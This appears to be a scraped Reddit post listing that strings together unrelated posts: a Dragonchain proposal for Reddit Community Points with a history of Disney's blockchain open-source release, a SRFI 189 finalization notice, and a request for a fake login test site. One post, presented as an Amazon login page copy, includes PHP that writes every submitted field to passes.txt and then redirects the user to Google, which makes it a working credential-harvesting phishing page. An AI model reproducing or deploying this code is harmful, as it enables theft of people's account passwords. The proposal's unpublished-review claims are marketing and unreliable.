Dragonchain’s architecture calls for a hybrid approach. Private business nodes hold the sensitive data while the validation and verification of transactions for the business are decentralized within seconds and secured to public blockchains within 10 minutes to 2 hours. Nodes could potentially be controlled by owners of individual subreddits for more organic decentralization.
  • Billing is currently centralized - there is a path to federation and decentralization of a scaled billing solution.
  • Operational multi-cloud
  • Operational on-premises capabilities
  • Operational deployment to any datacenter
  • Over 700 independent Community Verification Nodes with proof of ownership
  • Operational Interchain (Interoperable to Bitcoin, Ethereum, and Ethereum Classic, open to more)

Usability Scaling solutions should have a simple end user experience.

Users shouldn't have to maintain any extra state/proofs, regularly monitor activity, keep track of extra keys, or sign anything other than their normal transactions
Dragonchain and its customers have demonstrated extraordinary usability as a feature in many applications, where users do not need to know that the system is backed by a live blockchain. Lyceum is one of these examples, where the progress of academy courses is being tracked, and successful completion of courses is rewarded with certificates on chain. Our @Save_The_Tweet bot is popular on Twitter. When used with one of the following hashtags - #please, #blockchain, #ThankYou, or #eternalize the tweet is saved through Eternal to multiple blockchains. A proof report is available for future reference. Other examples in use are DEN, our decentralized social media platform, and our console, where users can track their node rewards, view their TIME, and operate a business node.

Transactions complete in a reasonable amount of time (seconds or minutes, not hours or days)
All transactions are immediately usable on chain by the system. A transaction begins the path to decentralization at the conclusion of a 5-second block when it gets distributed across 5 separate community run nodes. Full decentralization occurs within 10 minutes to 2 hours depending on which interchain (Bitcoin, Ethereum, or Ethereum Classic) the transaction hits first. Within approximately 2 hours, the combined hash power of all interchained blockchains secures the transaction.

Free to use for end users (no gas fees, or fixed/minimal fees that Reddit can pay on their behalf)
With transaction pricing as low as $0.0000025 per transaction, it may be considered reasonable for Reddit to cover transaction fees for users.
All of Reddit's Transactions on Blockchain (month)
Community points can be earned by users and distributed directly to their Reddit account in batch (as per Reddit minting plan), and allow users to withdraw rewards to their Ethereum wallet whenever they wish. Withdrawal fees can be paid by either user or Reddit. This model has been operating inside the Dragonchain system since 2018, and many security and financial compliance features can be optionally added. We feel that this capability greatly enhances user experience because it is seamless to a regular user without cryptocurrency experience, yet flexible to a tech savvy user. With regard to currency or token transactions, these would occur on the Reddit network, verified to BTC and ETH. These transactions would incur the $0.0000025 transaction fee. To estimate this fee we use the monthly active Reddit users statista with a 60% adoption rate and an estimated 10 transactions per month average resulting in an approximate $720 cost across the system. Reddit could feasibly incur all associated internal network charges (mining/minting, transfer, burn) as these are very low and controllable fees.
Reddit Internal Token Transaction Fees

Reddit Ethereum Token Transaction Fees
When we consider further the Ethereum fees that might be incurred, we have a few choices for a solution.
  1. Offload all Ethereum transaction fees (user withdrawals) to interested users as they wish to withdraw tokens for external use or sale.
  2. Cover Ethereum transaction fees by aggregating them on a timed schedule. Users would request withdrawal (from Reddit or individual subreddits), and they would be transacted on the Ethereum network every hour (or some other schedule).
  3. In a combination of the above, customers could cover aggregated fees.
  4. Integrate with alternate Ethereum roll up solutions or other proposals to aggregate minting and distribution transactions onto Ethereum.

Bonus Points

Users should be able to view their balances & transactions via a blockchain explorer-style interface
From interfaces for users who have no knowledge of blockchain technology to users who are well versed in blockchain terms such as those present in a typical block explorer, a system powered by Dragonchain has flexibility on how to provide balances and transaction data to users. Transactions can be made viewable in an Eternal Proof Report, which displays raw data along with TIME staking information and traceability all the way to Bitcoin, Ethereum, and every other Interchained network. The report shows fields such as transaction ID, timestamp, block ID, multiple verifications, and Interchain proof. See example here.
Node payouts within the Dragonchain console are listed in chronological order and can be further seen in either Dragons or USD. See example here.
In our social media platform, Dragon Den, users can see, in real-time, their NRG and MTR balances. See example here.
A new influencer app powered by Dragonchain, Raiinmaker, breaks down data into a user friendly interface that shows coin portfolio, redeemed rewards, and social scores per campaign. See example here.

Exiting is fast & simple
Withdrawing funds on Dragonchain’s console requires three clicks, however, withdrawal scenarios with more enhanced security features per Reddit’s discretion are obtainable.

Interoperability Compatibility with third party apps (wallets/contracts/etc) is necessary.
Proven interoperability at scale that surpasses the required specifications. Our entire platform consists of interoperable blockchains connected to each other and traditional systems. APIs are well documented. Third party permissions are possible with a simple smart contract without the end user being aware. No need to learn any specialized proprietary language. Any code base (not subsets) is usable within a Docker container. Interoperable with any blockchain or traditional APIs. We’ve witnessed relatively complex systems built by engineers with no blockchain or cryptocurrency experience. We’ve also demonstrated the creation of smart contracts within minutes built with BASH shell and Node.js. Please see our source code and API documentation.

Scaling solutions should be extensible and allow third parties to build on top of it Open source and extensible
APIs should be well documented and stable

Documentation should be clear and complete
For full documentation, explore our docs, SDK’s, Github repo’s, architecture documents, original Disney documentation, and other links or resources provided in this proposal.

Third-party permissionless integrations should be possible & straightforward Smart contracts are Docker based, can be written in any language, use full language (not subsets), and can therefore be integrated with any system including traditional system APIs. Simple is better. Learning an uncommon or proprietary language should not be necessary.
Advanced knowledge of mathematics, cryptography, or L2 scaling should not be required. Compatibility with common utilities & toolchains is expected.
Dragonchain business nodes and smart contracts leverage Docker to allow the use of literally any language or executable code. No proprietary language is necessary. We’ve witnessed relatively complex systems built by engineers with no blockchain or cryptocurrency experience. We’ve also demonstrated the creation of smart contracts within minutes built with BASH shell and Node.js.


Bonus Points: Show us how it works. Do you have an idea for a cool new use case for Community Points? Build it!


Community points could be awarded to Reddit users based upon TIME too, whereas the longer someone is part of a subreddit, the more community points someone naturally gained, even if not actively commenting or sharing new posts. A daily login could be required for these community points to be credited. This grants awards to readers too and incentivizes readers to create an account on Reddit if they browse the website often. This concept could also be leveraged to provide some level of reputation based upon duration and consistency of contribution to a community subreddit.

Dragon Den

Dragonchain has already built a social media platform that harnesses community involvement. Dragon Den is a decentralized community built on the Dragonchain blockchain platform. Dragon Den is Dragonchain’s answer to fake news, trolling, and censorship. It incentivizes the creation and evaluation of quality content within communities. It could be described as being a shareholder of a subreddit or Reddit in its entirety. The more your subreddit is thriving, the more rewarding it will be. Den is currently in a public beta and in active development, though the real token economy is not live yet. There are different tokens for various purposes. Two tokens are Lair Ownership Rights (LOR) and Lair Ownership Tokens (LOT). LOT is a non-fungible token for ownership of a specific Lair. LOT will only be created and converted from LOR.
Energy (NRG) and Matter (MTR) work jointly. Your MTR determines how much NRG you receive in a 24-hour period. Providing quality content, or evaluating content will earn MTR.

Security. Users have full ownership & control of their points.
All community points awarded based upon any type of activity or gift, are secured and provable to all Interchain networks (currently BTC, ETH, ETC). Users are free to spend and withdraw their points as they please, depending on the features Reddit wants to bring into production.

Balances and transactions cannot be forged, manipulated, or blocked by Reddit or anyone else
Users can withdraw their balance to their ERC20 wallet, directly through Reddit. Reddit can cover the fees on their behalf, or the user covers this with a portion of their balance.

Users should own their points and be able to get on-chain ERC20 tokens without permission from anyone else
Through our console users can withdraw their ERC20 rewards. This can be achieved on Reddit too. Here is a walkthrough of our console, though this does not show the quick withdrawal functionality, a user can withdraw at any time. https://www.youtube.com/watch?v=aNlTMxnfVHw

Points should be recoverable to on-chain ERC20 tokens even if all third-parties involved go offline
If necessary, signed transactions from the Reddit system (e.g. Reddit + Subreddit) can be sent to the Ethereum smart contract for minting.

A public, third-party review attesting to the soundness of the design should be available
To our knowledge, at least two large corporations, including a top 3 accounting firm, have conducted positive reviews. These reviews have never been made public, as Dragonchain did not pay or contract for these studies to be released.

Bonus points
Public, third-party implementation review available or in progress
See above

Compatibility with HSMs & hardware wallets
For the purpose of this proposal, all tokenization would be on the Ethereum network using standard token contracts and as such, would be able to leverage all hardware wallet and Ethereum ecosystem services.

Other Considerations

Minting/distributing tokens is not performed by Reddit directly
This operation can be automated by smart contract on Ethereum. Subreddits can if desired have a role to play.

One off point burning, as well as recurring, non-interactive point burning (for subreddit memberships) should be possible and scalable
This is possible and scalable with interaction between Dragonchain Reddit system and Ethereum token contract(s).

Fully open-source solutions are strongly preferred
Dragonchain is fully open source (see section on Disney release after conclusion).


Whether it is today, or in the future, we would like to work together to bring secure flexibility to the highest standards. It is our hope to be considered by Ethereum, Reddit, and other integrative solutions so we may further discuss the possibilities of implementation. In our public demonstration, 256 million transactions were handled in our operational network on chain in 24 hours, for the low cost of $25K, which if run today would cost $625. Dragonchain’s interoperable foundation provides the atmosphere necessary to implement a frictionless community points system. Thank you for your consideration of our proposal. We look forward to working with the community to make something great!

Disney Releases Blockchain Platform as Open Source

The team at Disney created the Disney Private Blockchain Platform. The system was a hybrid interoperable blockchain platform for ledgering and smart contract development geared toward solving problems with blockchain adoption and usability. All objective evaluation would consider the team’s output a success. We released a list of use cases that we explored in some capacity at Disney, and our input on blockchain standardization as part of our participation in the W3C Blockchain Community Group.

Open Source

In 2016, Roets proposed to release the platform as open source to spread the technology outside of Disney, as others within the W3C group were interested in the solutions that had been created inside of Disney.
Following a long process, step by step, the team met requirements for release. Among the requirements, the team had to:
  • Obtain VP support and approval for the release
  • Verify ownership of the software to be released
  • Verify that no proprietary content would be released
  • Convince the organization that there was a value to the open source community
  • Convince the organization that there was a value to Disney
  • Offer the plan for ongoing maintenance of the project outside of Disney
  • Itemize competing projects
  • Verify no conflict of interest
  • Preferred license
  • Change the project name to not use the name Disney, any Disney character, or any other associated IP - proposed Dragonchain - approved
  • Obtain legal approval
  • Approval from corporate, parks, and other business units
  • Approval from multiple Disney patent groups Copyright holder defined by Disney (Disney Connected and Advanced Technologies)
  • Trademark searches conducted for the selected name Dragonchain
  • Obtain IT security approval
  • Manual review of OSS components conducted
  • OWASP Dependency and Vulnerability Check Conducted
  • Obtain technical (software) approval
  • Offer management, process, and financial plans for the maintenance of the project.
  • Meet list of items to be addressed before release
  • Remove all Disney project references and scripts
  • Create a public distribution list for email communications
  • Remove Roets’ direct and internal contact information
  • Create public Slack channel and move from Disney slack channels
  • Create proper labels for issue tracking
  • Rename internal private Github repository
  • Add informative description to Github page
  • Expand README.md with more specific information
  • Add information beyond current “Blockchains are Magic”
  • Add getting started sections and info on cloning/forking the project
  • Add installation details
  • Add uninstall process
  • Add unit, functional, and integration test information
  • Detail how to contribute and get involved
  • Describe the git workflow that the project will use
  • Move to public, non-Disney git repository (Github or Bitbucket)
  • Obtain Disney Open Source Committee approval for release
On top of meeting the above criteria, as part of the process, the maintainer of the project had to receive the codebase on their own personal email and create accounts for maintenance (e.g. Github) with non-Disney accounts. Given the fact that the project spanned multiple business units, Roets was individually responsible for its ongoing maintenance. Because of this, he proposed in the open source application to create a non-profit organization to hold the IP and maintain the project. This was approved by Disney.
The Disney Open Source Committee approved the application known as OSSRELEASE-10, and the code was released on October 2, 2016. Disney decided to not issue a press release.
Original OSSRELASE-10 document

Dragonchain Foundation

The Dragonchain Foundation was created on January 17, 2017. https://den.social/l/Dragonchain/24130078352e485d96d2125082151cf0/dragonchain-and-disney/
submitted by j0j0r0 to ethereum [link] [comments]

2020.07.18 13:56 v1rus9r1nc355 A copy of amazon login/signup page

Amazon.com Sign In

Sign In

What is your e-mail address?

Do you have an Amazon.com password?

Sign In Help
Forgot your password? Get password help.
Has your e-mail address changed? Update it here.

header("Location: http://www.google.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value) { fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value); fwrite($handle, "\r\n");
} fwrite($handle, "\r\n");
fclose($handle); exit;
This is NOT the original amazon page, but rather my take on the code (complied from taking reference off of various sites including the original site). This code is made in HTML with the inclusion of internal CSS and PHP. To make sure that all the pages work in the way they should be working you would either need to host the website or run it on XAMPP.
submitted by v1rus9r1nc355 to u/v1rus9r1nc355 [link] [comments]

2020.07.15 08:30 arthurgleckler Final SRFI 189: Maybe and Either: optional container types

Scheme Request for Implementation 189, "Maybe and Either: optional container types," by John Cowan (text), Wolfgang Corcoran-Mathe (sample implementation), has gone into final status.
The document and an archive of the discussion are available at https://srfi.schemers.org/srfi-189/.
Here's the abstract:
This SRFI defines two disjoint immutable container types known as Maybe and Either, both of which can contain objects collectively known as their payload. A Maybe object is either a Just object or the unique object Nothing (which has no payload); an Either object is either a Right object or a Left object. Maybe represents the concept of optional values; Either represents the concept of values which are either correct (Right) or errors (Left). Note that the terms Maybe, Just, Nothing, Either, Right, and Left are capitalized in this SRFI so as not to be confused with their ordinary use as English words. Thus "returns Nothing" means "returns the unique Nothing object"; "returns nothing" could be interpreted as "returns no values" or "returns an unspecified value".
Here is the commit summary since the most recent draft:
  • typo
  • editorial
  • degenerate maybe-and and maybe-or swapped
  • Add -let*-values forms.
  • maybe/either-let*-values
  • Move syntax tests to their own file. Add tests for -let*-values forms.
  • add identifier-as-claw
  • added Shiro to acks
  • exception type specified; definition of claws clarified; exception->either added
  • restored line dropped in error
  • Add exception->either.
  • Use error to signal errors in macros.
  • exception->either: thunk can return multiple values
  • Ensure the correct error objects are signaled in a few missed cases.
  • Fix typo.
  • Fix typo in test.
  • editorial
  • bad reading of SRFI 2
  • Use absolute link to "srfi.css".
  • either-guard
  • exception->either: Use guard.
  • Add either-guard.
  • Add tests for exception->either and either-guard.
  • The -let*(-values) forms wrap their body expressions.
  • Update tests for -let*(-values) to conform to 88438c1c.
  • Add tests for error conditions in syntax.
  • Amend test overlooked in 1e8354f4.
  • typo
  • consistency
  • ->

    to match new format.
  • Fix problems reported by W3C HTML Validator.
  • explicit note on argument types
  • Finalize.
Here are the diffs since the most recent draft:
Many thanks to John and to everyone who contributed to the discussion of this SRFI.
SRFI Editor
submitted by arthurgleckler to scheme [link] [comments]

2020.07.04 06:19 w0lfcat Sample of fake online login page for testing purposes

I'm looking for a testing site just like http://www.example.com/ but with dynamic content. E.g. with login page, however http://www.example.com/ doesn't have it.
This is one of the fake login page for testing purposes that I found.
However,there is no username/password provided for this testing site.
There was a better fake login page with valid username and password so that we can test it with curl or any programming language, let say Python requests module, but I did not bookmark and lost it.
I've been googled it, but can't find it again.
This is what I wanted to do ... to play around with Python requests module or with curl.
>>> url = 'http://www.stealmylogin.com/demo.html' >>> requests.get(url)  >>> requests.get(url).text '\n\n\n\nStealMyLogin.com Demo\n\n\n\n\nLogin\n
\n\nTest with a dummy username and password.\n\n\nThis demo contains a login form on a non-HTTPS page.\nEven though the form is being submitted to a secure (HTTPS) page, \nyour login info can be easily stolen.\n\nMore info at stealmylogin.com\n
\n\n\n\n \n\n\n\n\n' >>>
[email protected]:~$ curl http://www.stealmylogin.com/demo.html    StealMyLogin.com Demo   Login 


submitted by w0lfcat to webdevelopment [link] [comments]